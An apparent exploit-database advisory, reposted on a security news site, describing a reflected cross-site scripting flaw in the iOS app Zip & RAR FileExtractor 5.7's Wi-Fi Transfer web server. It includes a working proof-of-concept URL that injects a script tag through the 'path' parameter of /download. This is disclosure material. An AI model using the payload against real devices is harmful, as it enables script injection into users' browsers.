Home Tools Exploits & CVE's Zip And RAR FileExtractor 5.7 Cross Site Scripting

Zip And RAR FileExtractor 5.7 Cross Site Scripting

June 30, 2023

247

Authored by tmrswrr

Zip and RAR FileExtractor version 5.7 suffers from a cross site scripting vulnerability.

# Exploit Title: Zip & RAR FileExtractor  v5.7 - Reflected XSS
# Vendor Homepage: Penghui Zhao
# Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en
# Date: 2023-06-20
# Exploit Author: tmrswrr
# Category : ios app
# Version: v5.7
# Tested on: Windows/Linux


## Description:

>> Go to Wi-Fi Transfer section in zip rar file extractor app
>> It will be create link : 192.168.1.104:8080
>> When open link your browser , write payload, xss payload execute page and see alert button

Url: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E
Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E

Zip And RAR FileExtractor 5.7 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Relate Learning And Teaching System SSTI / Remote Code Execution

Apache Solr Backup/Restore API Remote Code Execution

PowerVR PMRMMapPMR() Writability Check

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Simple Blog 3.2 Cross Site Scripting

Tiny File Manager 2.4.3 Shell Upload

Denver Smart Wifi Camera SHC-150 Remote Code Execution